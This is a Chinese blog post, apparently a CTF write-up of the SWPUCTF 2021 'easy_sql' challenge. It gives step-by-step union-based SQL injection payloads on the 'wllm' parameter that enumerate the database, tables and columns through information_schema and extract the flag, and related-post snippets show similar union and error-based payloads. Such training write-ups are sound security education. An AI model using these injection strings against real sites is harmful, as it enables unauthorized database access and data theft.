[SWPUCTF 2021 新生赛]easy_sql

于 2024-09-27 10:09:51 发布
阅读量22 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79210256/article/details/142551436
版权

打开发现一个杰哥图片打开源代码查看发现参数是wllm

然后试着注入一个参数wllm=1

回显了ok找注入点,?wllm=1'order by 3 --+ ok 发现字段数为三联合注入试试。

?wllm=-1'union select 1,2,3 --+ 发现回显位在2,3 

找到回显位之后爆库, 找到库名test_db

?wllm=-1 'union select 1,2,database() --+

然后再报表找到两个表名。

?wllm=-1 'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='test_db' --+

然后看看test.tb有哪些列,发现了flag和id

?wllm=-1 'union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='test_tb' --+

ok打开flag

?wllm=-1 'union select 1,2,flag from test_tb --+

NSSCTF{8c6a2acf-3018-46a5-a18e-85cbdc493c2a}

2301_79210256
关注
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 857
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
SWPUCTF 2021 新生 easy_sql
JasonJiao66的博客
01-28 469
当传1‘时出现报错,我们知道这是一个字符型注入,那么接下来还是先把句尾注释掉,然后使用order by语句,从1开始试,到4时开始报错,那么我们知道其有三个字段。首先打开题目,照片左上角求我们赶紧写一点东西,网站标题中则提升我们应该去传一个wllm的值,我们先给杰哥传一个1,回显正常。将1改为-1后,使用union selec,用户名与密码的位置出现了我们注入得到的2与3,表明这两个位置我们可用。接着继续加入limit n,1用group_concat()函数连接到一行显示来对库进行查询。
NSSCTF | [SWPUCTF 2021 新生]easy_sql
2302_80946742的博客
05-09 328
因为extractvalue()函数只能返回32个字符,因此我们使用substring()函数解决这个问题:例如substring("abc",1,1),此语句表示从第一个字符读取一个字符返回,在上面的payload中,我们得到的数据中,从第一个字符起读取30个字符返回。打开题目,提示输入一些东西,很显眼的可以看到网站标题为“参数是wllm”我们已经知道了字段数,直接爆库名(注意最后的空格)已经看到了flag字段,直接查看数据。报错了,可以判断为单引号闭合。可以看到一半的flag,然后爆表名(注意空格)
NSSCTF练习记录:[SWPUCTF 2021 新生]easy_sql
qq_44396970的博客
07-31 183
3的时候正常回显,4的时候显示Unknown column ‘4’ in ‘order clause’,说明有3列数据。在回显位上,输入database和version查看数据库名和版本。显示出数据库test_db中所有的表名。判断回显位在222处和333处。查看test_tb表中的所有列。查看网页发现参数为wllm。
【NSSCTF中SWPUCTF 2021新生easy_sql
AuroraMiraitowa的博客
01-30 448
wllm=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_name=‘test_db’–+wllm=-1’ union select 1,2,3–+(将id弄成一个负数的值,使前面的语句失效)然后看看union查询是否有回显位.6.接下来查询flag输入?
[SWPUCTF 2021 新生]easy_sql做题过程
heliar的博客
01-27 336
wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+查询表。wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段。查看得知回显为wllm,试输入?
SWPUCTF 2021 新生]easy_sql
mcw_ai_biancheng的博客
02-19 435
1,2,3--+查看回显。
[SWPUCTF 2021 新生]easy_sql的WriteUp
2301_76435948的博客
10-22 1387
可以看到有列名为id,flag,说明flag极大可能在这个表中。一道简单的sql注入题,首先查看源代码,看看参数是啥。可知,我们需要用到参数wllm。3可以,4不行,说明字段数为3。先试试test_tb表。用wllm参数试一下。
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 691
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 2955
此处主要在NSSCTF平台()上开展刷题。
[SWPUCTF 2021 新生]web方向(一到六题) 解题思路,实操解析,解题软件使用,解题方法教程
符啸九天的博客
09-07 389
[SWPUCTF 2021 新生]web方向 解题思路,实操解析,解题软件安装教程,解题方法教程。 [SWPUCTF 2021 新生]gift_F12、[SWPUCTF 2021 新生]jicao、[SWPUCTF 2021 新生]easy_md5、[SWPUCTF 2021 新生]include、[SWPUCTF 2021 新生]easy_sql
SQL - 进阶语法(一)
qq_51222843的博客
09-21 612
关于SQL的进阶语法教程,包括简单合并数据库,修改数据库内容等操作
Linux云计算 |【第四阶段】NOSQL-DAY2
小安的运维专栏
09-26 713
Redis集群概述、部署Redis集群(配置manage管理集群主机、创建集群、访问集群、添加节点、移除节点)
[OPEN SQL] SELECT语句
Hudas的博客
09-23 519
本文主要讲解OPEN SQL读取数据的SELECT语句相关知识点
Transact-SQL概述(SQL Server 2022)
brucexia的专栏
09-23 1253
Transact-SQL是Microsoft公司在关系数据库管理系统SQL Server中的SQL3标准的实现,是微软对SQL的扩展。在SQL Server中,所有与服务器实例的通信都是通过发送Transact-SQL语句到服务器来实现的。根据其完成的具体功能,可以将Transact-SQL语句分为四大类,分别为数据操作语句、数据定义语句、数据控制语句和一些附加的语言元素。
SQL 查询优化与实战
qq_63170044的博客
09-26 608
SQL 查询优化不仅仅是提高系统性能的重要手段,更是确保数据库在高并发环境下稳定运行的核心技能。通过合理使用索引、优化。
【达梦数据库】存储过程统计模式下表信息-SQL改写
最新发布
weixin_47686079的博客
09-26 193
在一次Oracle迁移Dm的过程中,源库&目的库大小写均敏感,执行客户提供的SQL脚本的过程中发现,表ip_address被系统默认成了表IP_ADDRESS。经过分析,客户提供的SQL没有使用双引号,来确保Oracle和Dm数据库按照指定的大小写来识别表名,因此,做以下改写。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值